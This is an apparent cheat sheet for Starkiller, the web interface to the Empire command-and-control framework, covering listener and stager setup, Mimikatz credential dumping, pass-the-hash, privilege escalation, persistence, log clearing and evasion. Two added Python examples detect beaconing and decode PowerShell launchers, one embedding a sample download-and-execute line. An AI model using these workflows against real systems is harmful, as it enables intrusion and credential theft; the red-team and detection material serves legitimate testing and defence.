Starkiller is a modern web-based interface for the Empire C2 framework, streamlining agent management, listener configuration, and post-exploitation workflows through an intuitive GUI instead of CLI-only operations.
| Method | Command | Notes |
|---|---|---|
| AppImage | Download from releases, chmod +x Starkiller*.AppImage && ./Starkiller*.AppImage | Standalone, no dependencies |
| Docker | docker run -p 3001:3001 bc1sdc/starkiller:latest | Isolated environment, easy deployment |
| Source | git clone https://github.com/BC-SECURITY/Starkiller && npm install && npm start | Requires Node.js 14+, full control |
| Binary | Download pre-built binaries from GitHub releases | Platform-specific (Linux, macOS, Windows) |
# Connect to Empire Server
# Default: localhost:1337 (Empire API)
# Alternative remote: https://empire-server.local:1337
# Connection Settings
- Username: empire (or custom admin)
- Password: empire (default, change on first login)
- API Token: Auto-generated after successful auth
- SSL/TLS: Configurable (required for production)
| Listener Type | Use Case | Configuration |
|---|---|---|
| HTTP | Standard web-based comms, lab/testing | Port 80, callback URL, user agent strings |
| HTTPS | Production, encrypted channel | Port 443, certificate/key, domain fronting |
| SMB | Lateral movement, internal networks | Pipe name, named pipes, SMB beacon |
| DNS | Covert tunnel, firewall evasion | Domain registration, DNS records, timing |
| Custom | Plugins, specialized protocols | Listener modules, Python-based |
1. Listeners → New Listener
2. Select type (HTTP/HTTPS/SMB/DNS)
3. Configure host (0.0.0.0 or specific IP)
4. Set port (80/443 for HTTP/HTTPS)
5. Optional: Domain fronting (Cloudflare, Akamai)
6. Set callback headers, user agent
7. Test → Launch
| Stager Type | Delivery | Output Format |
|---|---|---|
| Launcher | PowerShell one-liner, macro, script | Base64 encoded or PowerShell direct |
| Multi-Stage | Download agent, compile in-memory | Reduced initial footprint |
| Macro | Office documents (Word, Excel) | VBA payload embedded |
| Batch | CMD batch files, scheduled tasks | Windows native execution |
| HTA | HTML Application, mshta execution | Browser-based delivery |
| Embedded | Compiled binary, shellcode injection | .exe, .dll formats |
1. Stagers → New Stager
2. Select listener (pre-configured)
3. Choose stager type and language
4. Set encode, obfuscation options
5. Generate payload
6. Copy/download for delivery
7. Track generated stagers in list
Dashboard → Agents
- List all active/inactive agents
- Filter by listener, user, hostname, OS
- Last seen timestamp
- Stored credentials per agent
- Kill or interact with agent
| Function | Purpose | Notes |
|---|---|---|
| Shell Command | Execute system command | cmd.exe or powershell.exe |
| Load Module | Run exploitation module | Mimikatz, Sherlock, etc. |
| Upload File | Transfer file to agent | Binary/text, obfuscated |
| Download File | Exfiltrate data | Progress tracking, chunked |
| Rename Agent | Change display name | Internal tracking only |
| Kill Agent | Terminate session | Clean shutdown or force |
1. Agents → Click agent name
2. Interactive shell opens
3. Type commands (PowerShell syntax)
4. Output streams in real-time
5. Upload/download via buttons
6. Module execution from dropdown
| Module | Function | Example |
|---|---|---|
| Mimikatz | Credential dumping | credentials/mimikatz |
| Sherlock | Vulnerability detection | exploitation/sherlock |
| Bloodhound | AD mapping, pathfinding | recon/bloodhound |
| PowerUp | Privilege escalation checks | exploitation/powerup |
| Empire Launcher | Secondary payload | code_execution |
| WMI | Lateral movement | lateral_movement/wmi |
1. Agent → Interact
2. Select Module dropdown
3. Configure options (listener, target, etc.)
4. Set payload encoding/obfuscation
5. Execute module
6. Monitor output in shell
7. Download results or parse inline
| Type | Source | Data |
|---|---|---|
| Plaintext | Dumped passwords, manual entry | Username:password |
| Hash | Mimikatz, SAM dump | NTLM, LM hashes |
| Ticket | Kerberos ticket extraction | .kirbi, base64 encoded |
| Token | Token impersonation | OAuth, API tokens |
| Certificate | Certificate extraction | .pfx, .pem keys |
1. Load Mimikatz module on agent
2. Execute: `privilege::debug` → `sekurlsa::logonpasswords`
3. Credentials appear in Credentials tab
4. Filter/search by username, hash type
5. Export CSV for offline cracking
6. Use credentials for pivot/lateral movement
7. Notes field for tracking source agent
# Agent communicates with configured listener
# Listener type determines covert channel
# Multiple agents → Single listener (fan-in)
# Single agent → Multiple listeners (backup channels)
# Check agent beacon interval
# Modify in listener → Jitter (randomization)
# Detection: Beaconing patterns, metadata, DNS records
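The detection note above is what a blue team actually keys on: an agent polls its listener at a configured delay, and jitter only spreads the gaps around that delay rather than hiding the rhythm. The following is an added example, not code from Starkiller or Empire, showing how to surface such low-spread periodic client-to-host pairs in web-proxy logs. The log lines, hostnames and IPs are constructed for the example, and the thresholds (`min_events`, `max_rel_spread`) are assumptions to tune per environment.

```python
"""Flag periodic callbacks (beaconing) in constructed web-proxy log lines.

Beacon detection idea: for each (source IP, destination host) pair, compute the
gaps between consecutive requests. A polling agent produces gaps that cluster
around its interval, so the standard deviation divided by the mean (relative
spread) stays small even with jitter; human browsing does not.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: "<ISO timestamp> <src ip> <dst host> <path>".
# 10.0.0.5 polls updates.example.test roughly every 60 s with small jitter;
# 10.0.0.9 browses www.example.test irregularly. Neither is a real capture.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 updates.example.test /api/status
2024-03-01T10:01:03 10.0.0.5 updates.example.test /api/status
2024-03-01T10:01:58 10.0.0.5 updates.example.test /api/status
2024-03-01T10:03:02 10.0.0.5 updates.example.test /api/status
2024-03-01T10:03:59 10.0.0.5 updates.example.test /api/status
2024-03-01T10:05:01 10.0.0.5 updates.example.test /api/status
2024-03-01T10:00:10 10.0.0.9 www.example.test /index.html
2024-03-01T10:00:12 10.0.0.9 www.example.test /style.css
2024-03-01T10:07:40 10.0.0.9 www.example.test /article/42
2024-03-01T10:31:05 10.0.0.9 www.example.test /search?q=x
2024-03-01T10:31:07 10.0.0.9 www.example.test /logo.png
2024-03-01T11:02:00 10.0.0.9 www.example.test /index.html
"""


def parse_log(text):
    """Group request timestamps by (src, dst) pair."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _path = line.split()
        events[(src, dst)].append(datetime.fromisoformat(ts))
    return events


def interval_stats(timestamps):
    """Mean gap and relative spread (pstdev/mean) of inter-arrival times.

    Returns None when fewer than two gaps exist, since spread is meaningless.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    avg = mean(gaps)
    if avg == 0:
        return None
    return {"count": len(ts), "mean_gap": avg, "rel_spread": pstdev(gaps) / avg}


def find_beacons(text, min_events=5, max_rel_spread=0.2):
    """Return (src, dst, mean_gap, rel_spread) for pairs that look periodic."""
    flagged = []
    for (src, dst), ts in parse_log(text).items():
        stats = interval_stats(ts)
        if stats is None:
            continue
        if stats["count"] >= min_events and stats["rel_spread"] <= max_rel_spread:
            flagged.append((src, dst,
                            round(stats["mean_gap"], 1),
                            round(stats["rel_spread"], 3)))
    return flagged


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print("periodic callback:", hit)
```

Choosing `max_rel_spread` is the whole game: uniform jitter of plus or minus a fraction j of the interval gives a relative spread of about j/sqrt(3), so a 20% jitter setting lands near 0.12 and still clears a 0.2 threshold, while a 50% jitter setting (about 0.29) does not and would need a longer observation window or a second signal such as request size or URI repetition.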
| Feature | Use Case | Details |
|---|---|---|
| User Accounts | Multi-operator access | Role-based (admin, operator, read-only) |
| API Tokens | Automation, CI/CD | Token auth for scripts |
| Audit Log | Operational tracking | Login, agent commands, downloads |
| Notes/Tags | Team communication | Attach to agents, operations |
| Operation Workspace | Campaign organization | Separate projects, isolated agents |
Settings → Users → New User
- Username: operator1
- Password: (auto-generate or set)
- Role: operator (can execute) or viewer (read-only)
- Save API token for scripting
1. Reports → New Report
2. Select date range (operations period)
3. Include: Agents, listeners, modules executed
4. Filter by operator, listener type
5. Format: PDF (formatted) or CSV (data analysis)
6. Export credentials (with/without hashes)
7. Share with stakeholders (redact PII as needed)
- Agent list: CSV/JSON (for correlation)
- Module output: Plain text or JSON (parsing)
- Credentials: CSV (Excel, password managers)
- Network log: DNS, HTTP beacon analysis
- Timeline: Sorted by event timestamp
Plugins directory structure:

```
plugins/
├── listener_custom.py    # Custom listener protocol
├── module_custom.py      # Exploitation module
├── obfuscator_custom.py  # Encoding/evasion
└── stager_custom.py      # Delivery method
```
Load plugin: Settings → Plugins → Upload .zip
Enable/disable without restart
| Feature | Starkiller GUI | Empire CLI |
|---|---|---|
| Learning curve | Low (visual, intuitive) | Steep (command memorization) |
| Agent interaction | Real-time web shell | Command feedback loop |
| Listener setup | Form-based, validation | Manual config, error-prone |
| Reporting | One-click PDF export | Manual log parsing |
| Collaboration | Multi-user, audit log | Single-user, manual logging |
| Automation | REST API, limited | Python scripts, full control |
| Workflow speed | Fast (clicking) | Fast (scripting) |
| Advanced control | Limited (GUI constraints) | Full (direct Python) |
1. Create HTTP/HTTPS listener (callback domain)
2. Generate PowerShell launcher stager
3. Deliver via phishing email or web compromise
4. Wait for first beacon (check Dashboard)
5. Interact with agent shell
6. Execute initial reconnaissance
1. Gain agent on domain-joined machine
2. Load/execute Mimikatz module
3. Extract NTLM hashes and plaintext
4. Credentials tab auto-populates
5. Use hashes for pass-the-hash attacks
6. Pivot to other systems (lateral movement)
1. Run Sherlock module (vulnerability scan)
2. Execute PowerUp (privesc checks)
3. Review output for exploitable gaps
4. Load token impersonation module
5. Escalate to SYSTEM or admin token
6. Execute privileged commands
7. Dump SAM hive or LSASS process
# Persistence
1. Load empire launcher module
2. Create scheduled task or registry run key
3. Generate base64 launcher
4. Execute on agent (maintains access)
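Both the launcher stager (base64-encoded or direct PowerShell) and the persistence step above leave the same artifact on the host: a Run-key value or scheduled-task action whose command line is an encoded or inline PowerShell launcher. The following is an added example, not code from Starkiller or Empire, that triages such command lines the way a responder reviewing autoruns would: decode any `-EncodedCommand` argument and look for well-known launcher traits in the decoded text. The command lines, the `INDICATORS` list and the placeholder URL are constructed for the example.

```python
"""Triage autorun command lines for encoded or inline PowerShell launchers."""
import base64
import re

# Launcher traits to look for in a (decoded) command line. This is an assumed
# starting set for the example, not an Empire-specific signature.
INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "frombase64string", "-nop", "hidden", "invoke-webrequest",
)

# -EncodedCommand and its common short forms (-e, -enc) followed by base64.
# powershell.exe also accepts other prefixes; extend the alternation if needed.
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def _b64_utf16(script):
    """Encode a script the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample autorun values (not real captures): a benign program, an
# encoded launcher, a benign signed-script task, and an inline launcher.
SAMPLE_AUTORUNS = [
    r"C:\Windows\System32\notepad.exe",
    "powershell.exe -NoP -W Hidden -Enc " + _b64_utf16(
        "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "cmd.exe /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://placeholder.invalid/x')\"",
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_autoruns(cmdlines):
    """Return one dict per command line with its decoded payload and indicator hits."""
    results = []
    for idx, cmd in enumerate(cmdlines):
        decoded = decode_encoded_command(cmd)
        # Search both the raw command line and the decoded script.
        haystack = (cmd + " " + (decoded or "")).lower()
        hits = [ind for ind in INDICATORS if ind in haystack]
        results.append({"index": idx, "decoded": decoded,
                        "indicators": hits, "suspicious": bool(hits)})
    return results


if __name__ == "__main__":
    for row in triage_autoruns(SAMPLE_AUTORUNS):
        if row["suspicious"]:
            print(f"[{row['index']}] indicators={row['indicators']}")
            if row["decoded"]:
                print("    decoded:", row["decoded"])
```

The decode step matters more than the indicator list: an encoded launcher shows none of the traits on the raw command line, and the `-ExecutionPolicy Bypass -File` task is deliberately left unflagged to show that the regex does not mistake `-E...` prefixes for `-EncodedCommand`.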
# Cleanup
1. Kill scheduled task/registry entry
2. Clear Event Logs (via agent)
3. Remove temporary files
4. Disconnect agent gracefully
5. Delete listener (archive first)
| Practice | Implementation |
|---|---|
| SSL/TLS | Use HTTPS listeners, valid certificates |
| Firewall | Limit Empire API access to operator IPs |
| Credentials | Change default empire/empire on first login |
| Logs | Archive audit logs, review for anomalies |
| Network | Segment C2 from production networks |
| Obfuscation | Enable encoding, vary user agents, domain front |
| Monitoring | SIEM alerts on beacon patterns, failed auth |
| Encryption | Use encrypted channels (SMB pipes, DNS tunnels) |
| Issue | Solution |
|---|---|
| Agent not beaconing | Check that the listener IP/port is reachable and that the agent can resolve and reach the callback host |
| Module execution timeout | Increase timeout in settings, retry with smaller scope |
| Connection refused | Verify Empire server running, API port open, credentials correct |
| SSL certificate error | Disable cert verification (labs only) or install valid cert |
| Memory errors on large exports | Export in date ranges, filter agents before export |
| Slow UI response | Clear browser cache, reduce agent count in view, restart Starkiller |